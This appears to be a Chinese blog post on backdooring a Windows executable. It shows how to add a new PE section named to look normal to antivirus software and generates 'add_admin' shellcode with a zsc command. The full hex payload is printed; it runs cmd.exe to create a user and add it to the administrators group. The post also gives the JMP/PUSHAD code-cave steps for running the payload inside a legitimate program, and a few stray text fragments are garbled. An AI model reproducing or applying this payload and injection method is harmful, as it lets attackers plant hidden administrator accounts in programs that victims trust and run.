标签:none 生成 执行 扩展 导出 numbers content 循环 属性
先声明这是不免杀的,只是演示。
大小 | 英文名 | 描述 |
---|---|---|
1*8 | Name[8] | 就是pdata,为了给杀毒软件看着正常一点,尽量改为PE文件有的名称 |
4 | VirtualSize | 1000h,也就是00 10 00 00 |
4 | VirtualAddress | 上一个节表的VirtualAddress加上上一个VirtualSize再按照SectionAlignment的整数倍对齐。 |
4 | SizeOfRawData | FileAlignment域的倍数,改1000h就可以了 |
4 | PointerToRawData | 上一个节表的PointerToRawData加上SizeOfRawData再按照FileAlignment的整数倍对齐。 |
4 | PointerToRelocations | 00000000 |
4 | PointerToLinenumbers | 00000000 |
2 | NumberOfRelocations | 0000 |
2 | NumberOfLinenumbers | 0000 |
4 | Characteristics | 复制了第一个节点的,所以不用改 |
‘,‘\x
。生成shellcode
? ~ zsc -p windows_x86/add_admin/none -i "kt~~~kt" -o add_admin.c
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x61\x64\x64\x59\xc1\xe9\x08\x51\x68\x6b\x74\x20\x2f\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x61\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x64\x64\x20\x26\x68\x74\x20\x2f\x61\x68\x6b\x74\x20\x6b\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x50\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
正常指令
JMP 到shellcode入口地址
PUSHAD
PUSHFD
保存CPU现场
执行shellcode
执行完后恢复CPU现场
POPFD
POPAD
JMP调用shellcode入口地址的下一个地址
不太建议用call指令,因为会打乱堆栈数据,直接用JMP就可以了。
导出补丁文件。
标签:none 生成 执行 扩展 导出 numbers content 循环 属性
原文地址:https://www.cnblogs.com/Kali-Team/p/12255795.html